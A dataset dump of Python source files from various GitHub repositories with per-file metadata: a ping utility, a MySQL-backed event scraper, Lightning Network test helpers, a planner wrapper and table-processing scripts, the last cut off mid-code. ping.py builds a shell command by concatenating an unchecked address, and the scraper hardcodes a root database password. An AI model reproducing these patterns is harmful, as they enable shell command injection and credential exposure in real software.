| column | type | range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 classes |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable (⌀) |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | length 2–10.3M |
| authors | list | length 1 |
| author_id | string | length 0–212 |

Each record below lists these fields in this order, separated by `|`, with the multi-line `content` field shown inline between the metadata cells and the author cells.
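Since every column is typed, the constraints in this schema can be spot-checked programmatically. A minimal sketch, assuming one shard of the table has been exported to Parquet (the filename `shard.parquet` is a placeholder, not part of this dump):

```python
import pandas as pd

# Load one exported shard; the filename is a placeholder/assumption.
df = pd.read_parquet("shard.parquet")

# Spot-check a few of the constraints listed in the schema above.
assert df["blob_id"].str.len().eq(40).all()  # blob_id: fixed 40-char hex digest
assert df["language"].nunique() == 1         # language: a single class (Python)
assert df["length_bytes"].ge(2).all()        # length_bytes: minimum of 2 bytes

# Inspect the first record's metadata and the head of its file content.
row = df.iloc[0]
print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
print(row["content"][:200])
```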
858ab50888dd21c994d1bce41e4e88333eaaa575 | 8d17a510ab17dec28ac05d26d3a0aeccceb9671a | /service/ping.py | 163b376438712e900a8f99aaa7be6bada2e6d0db | [] | no_license | duysy/DSMonitoring | 6b7e2bc946f939dd0a1b911d7381e89b6e75d14e | c573e689aa7148cf397558d5cf6f4a0c1a4af9d2 | refs/heads/main | 2023-02-12T19:17:01.189478 | 2021-01-07T17:25:15 | 2021-01-07T17:25:15 | 323,513,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py |
import subprocess as sp
import sys


class Ping:
    def ping(self, ipAddress):
        if sys.platform.startswith('win'):
            status, result = sp.getstatusoutput("ping " + ipAddress)
        else:
            status, result = sp.getstatusoutput("ping -c1 -w2 " + ipAddress)
        if status == 0:
            print("System " + ipAddress + " is UP !")
            return True
        else:
            print("System " + ipAddress + " is DOWN !")
            return False

# ping = Ping()
# ping.ping("127.0.0.1")
| ["duyduysysy@gmail.com"] | duyduysysy@gmail.com |

d56303d442871076d3f279dc65ed8e5a21186c37 | 7541f7bf16b86dd00f43cf6c6a3ae4dfeb1ded07 | /python/py3study/capi/setup.py | 3c6c1c509434d6b19e50a7048b94f0d9c96adde3 | ["MIT"] | permissive | sillyemperor/langstudy | 382fd026b19676426b3023b49e5a485d5bc12b56 | 937a11d97984e10e4ead54f3b7b7d6a1f2ef24a1 | refs/heads/master | 2021-06-18T21:39:48.682000 | 2019-10-30T11:19:45 | 2019-10-30T11:19:45 | 206,315,555 | 0 | 0 | MIT | 2021-04-26T19:29:50 | 2019-09-04T12:36:55 | Python | UTF-8 | Python | false | false | 252 | py |
from distutils.core import setup, Extension

module1 = Extension('spam',
                    sources=['spammodule.c'])

setup(name='spammodule',
      version='1.0',
      description='This is a demo package',
      ext_modules=[module1])
| ["sillyemperor@163.com"] | sillyemperor@163.com |

bc52f1dbe657d63215c89f363cbe51dc31a0f7fb | 9bab49ef2da0cf65ceb0ff00472f803f1ecfb99f | /refine/convention/refine_gumico.py | 63e86277aa6508f2427f378169e75266c00687a3 | [] | no_license | abyssdog/crawling | 52fcd9c6f7306c5eb6706ffd93864af93727b0a0 | b8d406d3a8dc2d724cd521266567684a7cf000f2 | refs/heads/master | 2022-12-01T21:39:59.355055 | 2020-08-03T01:13:20 | 2020-08-03T01:13:20 | 262,006,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,773 | py |
import datetime
from datetime import timedelta
import pymysql
import re
from openpyxl import Workbook
from openpyxl import load_workbook


class CrawlClass(object):
    def __init__(self):
        self.host = 'localhost'

    def test_insert1(self):
        conn = pymysql.connect(
            host=self.host,
            port=3306,
            user='root',
            password='dangam1234',
            db='convention',
            charset='utf8'
        )
        curs = conn.cursor()
        sql = """
            SELECT *
            FROM RAW_SCHEDULE
            WHERE CONVENTION_NAME = 'gumico'
        """
        curs.execute(sql)
        rows = curs.fetchall()
        cnt = 0
        for row in rows:
            cnt += 1
            title_gumico = r'\<p class\=\"title\"\>(.*?)\<\!'
            title_pattern = r"(캣|도그|펫|동물|애견|애완)"  # pet-related keywords; row[3] => page source
            match = re.findall(title_gumico, row[3])  # extract the title first
            match2 = re.search(title_pattern, match[0])  # then filter the title by keyword
            pattern_host = r'\<em\>주 최\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>'  # host
            pattern_manage = r'\<em\>주 관\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>'  # organizer
            pattern_date = r'\<em\>기 간\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>'  # date range
            pattern_time = r'\<em\>시 간\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>'  # time range
            pattern_place = r'\<em\>장 소\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>'  # venue
            pattern_money = r'\<li\>\<img alt\=\"입장료\" src\=\"\/kor\/images\/program\/item\_sch\_04.gif\"\/\> \<span\>(.*)\<\/span\>'  # admission fee
            pattern_phone = r'\<em\>문 의\<\/em\>\<span\>(.*)\<\/span\>\<\/li\>'  # contact phone
            pattern_url = row[4]  # URL of this page
            pattern_home = r'<a href="([a-z]*.*)" tar'  # homepage link
            now = datetime.datetime.now()
            reg_date = now.strftime('%Y-%m-%d %H:%M:%S')
            z_start = ''
            z_end = ''
            if match2:
                print(match[0])  # title
                place = re.findall(pattern_place, row[3])
                if len(place) != 0:
                    str_place = place[0]
                else:
                    str_place = ''
                date = re.findall(pattern_date, row[3])
                tempdate = str(date).replace("['", "").replace("']", "").strip()
                date_index = tempdate.find('~')
                date_start = tempdate[0:date_index].replace('.', '-')
                date_end = tempdate[date_index+1:len(tempdate)].replace('.', '-')
                time = re.findall(pattern_time, row[3])
                temptime = str(time).replace("['", "").replace("']", "").strip()
                time_index = temptime.find('~')
                time_start = temptime[0:time_index]
                time_end = temptime[time_index+1:len(temptime)]
                phone = re.findall(pattern_phone, row[3])
                if len(phone) != 0:
                    str_phone = phone[0].strip()
                else:
                    str_phone = ''
                home = re.findall(pattern_home, row[3])
                if len(home) > 0:
                    str_home = home[0].strip()
                else:
                    str_home = ''
                manage = re.findall(pattern_manage, row[3])
                if len(manage) != 0:
                    str_manage = manage[0].strip()
                else:
                    str_manage = ''
                host = re.findall(pattern_host, row[3])
                money = re.findall(pattern_money, row[3])
                if len(money) != 0:
                    str_money = money[0]
                else:
                    str_money = ''
                print("주최 {}".format(host[0]))  # host
                print("주관 {}".format(str_manage))  # organizer
                print(date)
                print(datetime.datetime.strptime(date_start.strip(), '%Y-%m-%d'))
                d_start = datetime.datetime.strptime(date_start.strip(), '%Y-%m-%d')
                print(datetime.datetime.strptime(date_end.strip(), '%Y-%m-%d'))
                d_end = datetime.datetime.strptime(date_end.strip(), '%Y-%m-%d')
                print('{start} ~ {end}'.format(start=time_start, end=time_end))
                print("장소 {}".format(str_place))  # venue
                print("돈 {}".format(str_money))  # admission fee
                print("폰번호 {}".format(str_phone))  # phone number
                print("홈페이지 {}".format(str_home))  # homepage
                query = """insert into refine_schedule
                    (convention_name, event_name, full_address,
                    place_dept1, place_dept2, place_dept3, date_start, date_end,
                    time_start, time_end, phone_number, home_page, manage, host,
                    money, event_desc, source_url, source_name, reg_date)
                    values(%s, %s, %s, %s, %s, %s, %s, %s
                    , %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
                """
                executed = curs.execute(query,
                    ('gumico', match[0],
                     'gumico 경상북도 구미시 산동면 첨단기업1로 49 {place}'.format(place=str_place),
                     '구미시', '산동면', '첨단기업1로 49',
                     d_start, d_end, time_start, time_end,
                     str_phone,
                     str_home, '', host[0], str_money, '',
                     pattern_url, 'gumico', reg_date))
        conn.commit()
        conn.close()


if __name__ == '__main__':
    crawl = CrawlClass()
    crawl.test_insert1()
| ["abyssdog@dangamsoft.com"] | abyssdog@dangamsoft.com |

1c8644801d4f3284a3ca00d2e2b3c0baf999df32 | 19679e7853a3c5a7fe2fbfd898b4c94bfdd06678 | /TContacts/main.py | 72ac87d18ef8f5f447d60c93b9d396283ee8a8b2 | [] | no_license | danielteberian/TContacts | a8a524990874dbf9cbcd3dc85e92988ae1861772 | d0034cc1ef6601b48ed24787fc119062514ba718 | refs/heads/main | 2023-04-14T19:45:19.672599 | 2021-05-04T00:55:45 | 2021-05-04T00:55:45 | 363,562,379 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py |
import sys

from PyQt5.QtWidgets import QApplication

from .database import createConnection
from .views import Window


def main():
    app = QApplication(sys.argv)
    if not createConnection("contacts.sqlite"):
        sys.exit(1)
    win = Window()
    win.show()
    sys.exit(app.exec())
| ["danielteberian@gmail.com"] | danielteberian@gmail.com |

b209e7c64878457a0369057c5792e83d8cef26bc | 76887783e57477f991f9d37b2f411064a2a798d2 | /bin/backgroundSubtraction.py | c37bf3879e00e5ea0973a83220b8356193706b24 | [] | no_license | dougnd/vehicleTrackingPalmetto | 6bd9f9166a86b693998d4a05a38c9c8b738a3d37 | d22fd747041cfb8d86a8c984195dd083093e693d | refs/heads/master | 2021-01-13T08:49:36.797896 | 2016-12-15T22:11:20 | 2016-12-15T22:11:20 | 71,915,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,428 | py |
import vtpalmetto
from sh import rm, Command, cp
import re
import argparse
import time
import numpy as np

runHours = 10
vtp = vtpalmetto.VTPalmetto()
vtp.qsubParams = dict(l='select=1:ncpus=6:mem=16gb,walltime={0}:00:00'.format(
    runHours))
vtp.name = 'backgroundSubtraction'

testFrames = [10, 11, 12, 13, 14]
trainFrames = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
x = 0
y = 0
w = 5300
h = 3500
sz = 300
n = 20


def task(dataset, _job):
    startTime = time.time()
    vtp.setJob(_job)
    vtp.gotoTmp()
    rm('-rf', 'vehicleTracking')
    vtp.getVT()
    vtp.cmakeVT()
    vtp.makeVT('basicDetector')
    basicDetector = Command("util/basicDetector")
    vtp.makeVT('detectionAccuracy')
    detectionAccuracy = Command("util/detectionAccuracy")
    cp('-r', vtp.srcDir+'/data/labels/skycomp1', '.')
    results = dict()
    for threshold in np.square(np.arange(1.0, 15.0, 0.1)):
        basicDetector('-r', x, y, w, h, '-s', sz, '-n', n, '-g', vtp.gpuDev,
                      '-t', threshold, "-d", "background", dataset)
        out = vtp.detectionAccuracy(l=dataset, d='detections.pb',
                                    t=' '.join(str(t) for t in trainFrames),
                                    T=' '.join(str(t) for t in testFrames))
        results[threshold] = out
    return results


parser = argparse.ArgumentParser()
parser.add_argument('command', choices=['submit', 'status', 'results'])


class optionalFile(argparse.FileType):
    def __call__(self, string):
        if string == None:
            return None
        return super(optionalFile, self).__call__(string)


parser.add_argument('-f', '--filename', default=None, type=optionalFile('w'))
args = parser.parse_args()

if args.command == 'submit':
    vtpalmetto.submit(vtp, task, [dict(dataset='skycomp1')])
elif args.command == 'status':
    vtpalmetto.printStatus(vtp)
elif args.command == 'results':
    jobs = vtp.getJobs()
    from tabulate import tabulate
    for j in jobs:
        ret = j.decode(j.retVal)
        params = j.decode(j.params)
        print 'params: {0}'.format(params)
        ret = sorted((dict(threshold=k, **v) for k, v in ret.iteritems()),
                     key=lambda x: x['threshold'])
        print tabulate(ret, headers='keys')
        if args.filename != None:
            import json
            print "writing out results to file"
            args.filename.write(json.dumps(ret))
        #d = {}
        #for k in ret[0].keys():
        #    d[k] = [int(ret[i][k]) for i in sorted(ret.keys())]
        #print d
| ["dougnd@gmail.com"] | dougnd@gmail.com |

50102739f72f9582a523ede93ba809e7e04c7c54 | 5acbe301bec58ca72b9952f58e7c859832eaf021 | /1_ProceduralProg/Chap02/Exo02/count_chars.py | cff565d74fafcaf21c38e1df87f3ae997cb6c5c0 | [] | no_license | sovoessi/PYTHON | 558f90f045603b92a154dc37dcdffc287e0dcb06 | aeda903fb08dce485f8d2c9c089a48c66d79f623 | refs/heads/master | 2023-04-10T18:12:22.614658 | 2021-04-21T10:08:52 | 2021-04-21T10:08:52 | 360,092,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py |
in_user = input("What is the input string? ")
print(f"{in_user} has {len(in_user)} characters.")
| ["jacksovoessi@hotmail.com"] | jacksovoessi@hotmail.com |

aabadc504dfeff265515c90881f8e004e9daa705 | c6fe47c1d631a29e86c5a9f8c2a2cba8b3b1b520 | /tests/test_utils/lnd.py | 573a36ee7c912c97715ae37bb2b2adeb03fa2bb5 | ["MIT"] | permissive | merta1/lnd_grpc | ad2d9f731ee84f34ea6e9fab807c9d98990d752d | 09091b8a7d25f47abd32ea25896fc47cdb95d105 | refs/heads/master | 2020-05-20T05:35:02.008216 | 2019-04-29T08:33:15 | 2019-04-29T08:33:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,786 | py |
import logging
import os
import time

from ephemeral_port_reserve import reserve

from lnd_grpc.lnd_grpc import Client as lndClient
from test_utils.utils import TailableProc, BITCOIND_CONFIG

# Needed for grpc to negotiate a valid cipher suite
os.environ["GRPC_SSL_CIPHER_SUITES"] = 'HIGH+ECDSA'


class LndD(TailableProc):

    CONF_NAME = 'lnd.conf'

    def __init__(self, lightning_dir, bitcoind, port, node_id):
        super().__init__(lightning_dir, 'lnd({})'.format(node_id))
        self.lightning_dir = lightning_dir
        self.bitcoind = bitcoind
        self.port = port
        self.rpc_port = str(reserve())
        self.rest_port = str(reserve())
        self.prefix = f'lnd-{node_id}'
        try:
            if os.environ['TRAVIS_BUILD_DIR']:
                self.tlscertpath = os.environ[
                    'TRAVIS_BUILD_DIR'] + '/tests/test_utils/test-tls.cert'
        except KeyError:
            self.tlscertpath = 'test_utils/test-tls.cert'
        try:
            if os.environ['TRAVIS_BUILD_DIR']:
                self.tlskeypath = os.environ['TRAVIS_BUILD_DIR'] + '/tests/test_utils/test-tls.key'
        except KeyError:
            self.tlskeypath = 'test_utils/test-tls.key'

        self.cmd_line = [
            'lnd',
            '--bitcoin.active',
            '--bitcoin.regtest',
            '--datadir={}'.format(lightning_dir),
            '--debuglevel=trace',
            '--rpclisten=127.0.0.1:{}'.format(self.rpc_port),
            '--restlisten=127.0.0.1:{}'.format(self.rest_port),
            '--listen=127.0.0.1:{}'.format(self.port),
            '--tlscertpath={}'.format(self.tlscertpath),
            '--tlskeypath={}'.format(self.tlskeypath),
            '--bitcoin.node=bitcoind',
            '--bitcoind.rpchost=127.0.0.1:{}'.format(BITCOIND_CONFIG.get('rpcport', 18332)),
            '--bitcoind.rpcuser=rpcuser',
            '--bitcoind.rpcpass=rpcpass',
            '--bitcoind.zmqpubrawblock=tcp://127.0.0.1:{}'.format(self.bitcoind.zmqpubrawblock_port),
            '--bitcoind.zmqpubrawtx=tcp://127.0.0.1:{}'.format(self.bitcoind.zmqpubrawtx_port),
            '--configfile={}'.format(os.path.join(lightning_dir, self.CONF_NAME)),
            '--nobootstrap',
            '--noseedbackup',
            '--trickledelay=500'
        ]

        if not os.path.exists(lightning_dir):
            os.makedirs(lightning_dir)
        with open(os.path.join(lightning_dir, self.CONF_NAME), "w") as f:
            f.write("""[Application Options]\n""")

    def start(self):
        super().start()
        self.wait_for_log('RPC server listening on')
        self.wait_for_log('Done catching up block hashes')
        time.sleep(3)
        logging.info('LND started (pid: {})'.format(self.proc.pid))

    def stop(self):
        self.proc.terminate()
        time.sleep(3)
        if self.proc.poll() is None:
            self.proc.kill()
        self.proc.wait()
        super().save_log()


class LndNode(lndClient):

    displayname = 'lnd'

    def __init__(self, lightning_dir, lightning_port, bitcoind, executor=None, node_id=0):
        self.bitcoin = bitcoind
        self.executor = executor
        self.daemon = LndD(lightning_dir, bitcoind, port=lightning_port, node_id=node_id)
        self.node_id = node_id
        self.logger = logging.getLogger(name='lnd-node({})'.format(self.node_id))
        self.myid = None
        self.invoice_rpc_active = False
        super().__init__(lnd_dir=lightning_dir,
                         grpc_host='localhost',
                         grpc_port=str(self.daemon.rpc_port),
                         network='regtest',
                         tls_cert_path=self.daemon.tlscertpath,
                         macaroon_path=lightning_dir + 'chain/bitcoin/regtest/admin.macaroon')

    def id(self):
        if not self.myid:
            self.myid = self.get_info().identity_pubkey
        return self.myid

    def restart(self):
        self.daemon.stop()
        time.sleep(5)
        self.daemon.start()

    def stop(self):
        self.daemon.stop()

    def start(self):
        self.daemon.start()
        self.daemon.wait_for_log('Starting sub RPC server: InvoicesRPC', timeout=10)
        self.invoice_rpc_active = True

    def add_funds(self, bitcoind, amount):
        start_amt = self.wallet_balance().total_balance
        addr = self.new_address('p2wkh').address
        bitcoind.rpc.sendtoaddress(addr, amount)
        self.daemon.wait_for_log("Inserting unconfirmed transaction")
        bitcoind.rpc.generate(3)
        self.daemon.wait_for_log("Marking unconfirmed transaction")
        # The above still doesn't mean the wallet balance is updated,
        # so let it settle a bit
        i = 0
        while self.wallet_balance().total_balance != (start_amt + (amount * 10 ** 8)) and i < 30:
            time.sleep(0.25)
            i += 1
        assert (self.wallet_balance().total_balance == start_amt + (amount * 10 ** 8))

    def check_channel(self, remote):
        """ Make sure that we have an active channel with remote
        """
        self_id = self.id()
        remote_id = remote.id()
        channels = self.list_channels()
        channel_by_remote = {c.remote_pubkey: c for c in channels}
        if remote_id not in channel_by_remote:
            self.logger.warning("Channel {} -> {} not found".format(self_id, remote_id))
            return False
        channel = channel_by_remote[remote_id]
        self.logger.debug("Channel {} -> {} state: {}".format(self_id, remote_id, channel))
        return channel.active

    def block_sync(self, blockhash):
        print("Waiting for node to learn about", blockhash)
        self.daemon.wait_for_log('NTFN: New block: height=([0-9]+), sha={}'.format(blockhash))
| ["noreply@github.com"] | merta1.noreply@github.com |

83ff841244fcd72238e5a536dca7417a458e86f2 | 73a803650cbd64615091e57d13101e9420e25b22 | /tweetapp/migrations/0006_auto_20200907_2123.py | 52ec2822282b7dbd1b95871d1f59d39ea77b9ebb | [] | no_license | Joseph455/tweet-clone | e332cb393983767142858205dfa508f580b2491e | 0fcfc62263ca6a9f9bd933d016df2df9dca4e6be | refs/heads/master | 2023-07-10T16:02:47.482217 | 2021-08-21T18:27:42 | 2021-08-21T18:27:42 | 330,186,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py |
# Generated by Django 3.0.8 on 2020-09-07 21:23

import datetime
from django.db import migrations, models
from django.utils.timezone import utc


class Migration(migrations.Migration):

    dependencies = [
        ('tweetapp', '0005_auto_20200907_2120'),
    ]

    operations = [
        migrations.AlterField(
            model_name='message',
            name='date_created',
            field=models.DateTimeField(default=datetime.datetime(2020, 9, 7, 21, 23, 27, 443239, tzinfo=utc)),
        ),
    ]
| ["adebowalejojo2001@gmail.com"] | adebowalejojo2001@gmail.com |

09903d4b9833932dbf2e2f99e2d1f45a1660182f | 3a8408aefe35580e4c1f6a4ac3d22c8bf41827af | /demo/goal_planner_gui/src/planning.py | 5dda51c72081291d7976579c1779438ce26f14b2 | [] | no_license | Hankfirst/neurobots_demonstrator | df9cc2b44785da6866fb8161bd9ac4811f886009 | b77fadce8054163899ff7ca65d2d4417441649f0 | refs/heads/master | 2021-09-24T22:04:15.493990 | 2018-10-15T13:27:20 | 2018-10-15T13:27:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,256 | py |
from os.path import abspath, dirname

from configobj import ConfigObj
from pddllib import pddl

import cplan
import goals
import logging

logger = logging.getLogger('root')

# planner config
CONFIG_FN = "config.ini"


class Planner(object):
    def __init__(self, state, config_path):
        config = ConfigObj(config_path+CONFIG_FN, file_error=True, list_values=False, interpolation="ConfigParser")
        config['src_path'] = abspath(dirname(__file__))
        config = cplan.utils.config_to_struct(config)
        self.planner = getattr(cplan.planner, config.base_planner.planner)(config)
        self.state = state
        self.problem = state.problem
        self.plan = None

    def set_state(self, state):
        self.state = state
        self.problem = state.problem

    def execute_action(self, action, args):
        logger.debug("execute action (%s %s)" % (action.name, " ".join(map(str, args))))
        new_state = None
        with action.instantiate(dict(zip(action.args, args)), self.problem):
            if not self.state.is_executable(action):
                return False
            new_state = self.state.copy()
            new_state.apply_effect(action.effect)
        init_facts = [f.to_init() for f in new_state.iterfacts()]
        new_prob = pddl.Problem(self.problem.name, self.problem.objects, init_facts, self.problem.goal, self.problem.domain, self.problem.optimization, self.problem.opt_func)
        self.problem = new_prob
        self.state = new_state
        return True

    def find_plan(self, goal):
        problem = self.problem.copy()
        pddlgoal = goal.pddl_goal()
        problem.goal = pddlgoal.copy(new_scope=problem)
        logger.debug(problem.goal.pddl_str())
        task = cplan.task.Task(problem, 0)
        # task.deadline = 220
        task.set_planner(self.planner)
        task.problem_to_state()
        task.replan()
        logger.debug(task.plan)
        self.plan = task.plan

    def get_plan(self):
        if self.plan is None:
            return []
        sorted_plan = self.plan.topological_sort()
        return [a for a in sorted_plan if a not in (self.plan.init_node, self.plan.goal_node)]
| ["kuhnerd@informatik.uni-freiburg.de"] | kuhnerd@informatik.uni-freiburg.de |

441a9766f2e2c2e0dc1072e93602ca8d44b81b43 | b1fb6abd2ec53d180e45c02bcec2e5c8b8ab5729 | /src/scriptManipulateTable.py | b740b2073be62ad2be5c27fbdfaff25eba0f264f | [] | no_license | biobakery/pouchitis | 1162075fb9b889b788fbaf2147399235d3fb73fb | b19d3a18159a5ef1c5ed8580f7b66956b01eabd1 | refs/heads/master | 2022-07-05T20:58:02.113791 | 2020-05-21T00:09:44 | 2020-05-21T00:09:44 | 265,713,286 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,676 | py |
#!/usr/bin/env python
"""
Author: Timothy Tickle
Description: Performs common manipulations on tables
"""

__author__ = "Timothy Tickle"
__copyright__ = "Copyright 2012"
__credits__ = ["Timothy Tickle"]
__license__ = ""
__version__ = ""
__maintainer__ = "Timothy Tickle"
__email__ = "ttickle@sph.harvard.edu"
__status__ = "Development"

import argparse
import csv
import sys
import re
import os
import numpy as np
from AbundanceTable import AbundanceTable
from PCA import PCA
from ValidateData import ValidateData

#Set up arguments reader
argp = argparse.ArgumentParser( prog = "scriptManipulateTable.py",
    description = """Performs common manipulations on tables.\nExample: python scriptManipulateTable.py -i TID -l STSite Test.pcl""" )

#Arguments
#Describe table
argp.add_argument("-i","--id", dest="sIDName", default="ID", help="Abundance Table ID")
argp.add_argument("-l","--meta", dest="sLastMetadataName", help="Last metadata name")
argp.add_argument("-d","--fileDelim", dest= "cFileDelimiter", action= "store", default="\t", help="File delimiter, default tab")
argp.add_argument("-f","--featureDelim", dest= "cFeatureDelimiter", action= "store", default="|", help="Feature (eg. bug or function) delimiter, default '|'")
#Checked x 2
argp.add_argument("-n","--doNorm", dest="fNormalize", action="store_true", default=False, help="Flag to turn on normalization")
argp.add_argument("-s","--doSum", dest="fSum", action="store_true", default=False, help="Flag to turn on summation")
#Unsupervised filtering
argp.add_argument("-A","--doFilterAbundance", dest="strFilterAbundance", action="store", default=None, help="Turns on filtering by abundance (remove features that do not have a minimum abundance in a minimum number of samples); should be a real number and an integer in the form 'minAbundance,minSamples' (should be performed on a normalized file).")
argp.add_argument("-P","--doFilterPercentile", dest="strFilterPercentile", action="store", default=None, help="Turns on filtering by percentile. Should be two numbers between 0 and 1 in the form 'percentile,percentage' (should be performed on a normalized file).")
argp.add_argument("-O","--doFilterOccurrence", dest="strFilterOccurence", action="store", default=None, help="Turns on filtering by occurrence. Should be two integers in the form 'minSequence,minSample' (should NOT be performed on a normalized file).")
#argp.add_argument("-D","--doFilterDeviation", dest="dCuttOff", action="store", type=float, default=None, help="Flag to turn on filtering by standard deviation (should NOT be performed on a normalized file).")
#Change bug membership
argp.add_argument("-t","--makeTerminal", dest="fMakeTerminal", action="store_true", default=False, help="Reduces the file to terminal features in the original file.")
argp.add_argument("-u","--reduceOTUs", dest="fRemoveOTUs", action="store_true", default=False, help="Remove OTU entries from file.")
argp.add_argument("-c","--reduceToClade", dest="iClade", action="store", type=int, default=None, help="Specify a level of clade to reduce to [].")
argp.add_argument("-b","--reduceToFeatures", dest="strFeatures", action="store", default=None, help="Reduce measurements to certain features (bugs or functions). This can be a comma delimited string (of at least 2 bugs) or a file.")
#Manipulate based on metadata
#Checked
argp.add_argument("-y","--stratifyBy", dest="strStratifyBy", action="store", default=None, help="Metadata to stratify tables by.")
argp.add_argument("-r","--removeMetadata", dest="strRemoveMetadata", action="store", default=None, help="Remove samples of this metadata and value (format comma delimited string with metadata id first and the values to remove after, 'id,value1,value2').")
#Manipulate lineage
#Checked
argp.add_argument("-x","--doPrefixClades", dest="fPrefixClades", action="store_true", default=False, help="Flag to turn on adding prefixes to clades to better identify them; for example, s__ will be placed in front of each species.")
#Combine tables
#argp.add_argument("-m","--combineIntersect", dest="fCombineIntersect", action="store_true", default=False, help="Combine two tables including only common features/metadata (intersection).")
#argp.add_argument("-e","--combineUnion", dest="fCombineUnion", action="store_true", default=False, help="Combine two tables (union).")
#Dimensionality Reduction
argp.add_argument("-p","--doPCA", dest="fDoPCA", action="store_true", default=False, help="Flag to turn on adding metabugs and metametadata by performing PCA on each of bug relative abundance and continuous metadata and adding the resulting components")
#Checked
argp.add_argument("-o","--output", dest="strOutFile", action="store", default=None, help="Indicate output pcl file.")
argp.add_argument("strFileAbund", help="Input data file")
args = argp.parse_args()

# Create output file if needed.
if not args.strOutFile:
    args.strOutFile = os.path.splitext(args.strFileAbund)[0]+"-mod.pcl"
lsPieces = os.path.splitext(args.strOutFile)

#List of abundance tables
lsTables = []

#Read in abundance table
abndTable = AbundanceTable.funcMakeFromFile(xInputFile=args.strFileAbund,
                                            cDelimiter = args.cFileDelimiter,
                                            sMetadataID = args.sIDName,
                                            sLastMetadata = args.sLastMetadataName,
                                            lOccurenceFilter = None,
                                            cFeatureNameDelimiter=args.cFeatureDelimiter,
                                            xOutputFile = args.strOutFile)

#TODO Check filtering, can not have some filtering together

# Make feature list
lsFeatures = []
if args.strFeatures:
    print "Get features not completed"
#    if "," in args.strFeatures:
#        lsFeatures = args.strFeatures.split(",")
#        print "ManipulateTable::Reading in feature list "+str(len(lsFeatures))+"."
#    else:
#        csvr = csv.reader(open(args.strFeatures, "rU"))
#        print "ManipulateTable::Reading in feature file "+args.strFeatures+"."
#        for lsLine in csvr:
#            lsFeatures.extend(lsLine)

lsTables.append(abndTable)

# Sum if needed
if args.fSum:
    for abndTable in lsTables:
        print "ManipulateTable::"+abndTable.funcGetName()+" had "+str(len(abndTable.funcGetFeatureNames()))+" features before summing."
        fResult = abndTable.funcSumClades()
        if fResult:
            print "ManipulateTable::"+abndTable.funcGetName()+" was summed."
            print "ManipulateTable::"+abndTable.funcGetName()+" has "+str(len(abndTable.funcGetFeatureNames()))+" features after summing."
        else:
            print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was NOT summed."

# Filter on counts
if args.strFilterOccurence:
    iMinimumSequence,iMinimumSample = args.strFilterOccurence.split(",")
    for abndTable in lsTables:
        if abndTable.funcIsNormalized():
            print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" is normalized and can not be filtered by occurrence. This filter needs counts."
        else:
            fResult = abndTable.funcFilterAbundanceBySequenceOccurence(iMinSequence = int(iMinimumSequence), iMinSamples = int(iMinimumSample))
            if fResult:
                print "ManipulateTable::"+abndTable.funcGetName()+" was filtered by occurrence and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
            else:
                print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was NOT filtered by occurrence."

# Change bug membership
if args.fMakeTerminal:
    lsTerminalTables = []
    for abndTable in lsTables:
        print "ManipulateTable::"+abndTable.funcGetName()+" had "+str(len(abndTable.funcGetFeatureNames()))+" features before making terminal."
        abndTable = abndTable.funcGetFeatureAbundanceTable(abndTable.funcGetTerminalNodes())
        if abndTable:
            print "ManipulateTable::"+abndTable.funcGetName()+" has "+str(len(abndTable.funcGetFeatureNames()))+" terminal features."
            lsTerminalTables.append(abndTable)
        else:
            print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was not made terminal."
    lsTables = lsTerminalTables

if args.fRemoveOTUs:
    lsNotOTUs = []
    for abndTable in lsTables:
        print "ManipulateTable::"+abndTable.funcGetName()+" had "+str(len(abndTable.funcGetFeatureNames()))+" features before removing OTUs."
        abndTable = abndTable.funcGetWithoutOTUs()
        if abndTable:
            print "ManipulateTable::"+abndTable.funcGetName()+" had OTUs removed and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
            lsNotOTUs.append(abndTable)
        else:
            print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" OTUs were not removed."
    lsTables = lsNotOTUs

if args.iClade:
    for abndTable in lsTables:
        fResult = abndTable.funcReduceFeaturesToCladeLevel(args.iClade)
        if fResult:
            print "ManipulateTable::"+abndTable.funcGetName()+" was reduced to clade level "+str(args.iClade)+"."
        else:
            print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" was NOT reduced in clade levels."

if args.strFeatures:
    for abndTable in lsTables:
        fResult = abndTable.funcGetFeatureAbundanceTable(lsFeatures)
        if fResult:
            print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced to given features and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
        else:
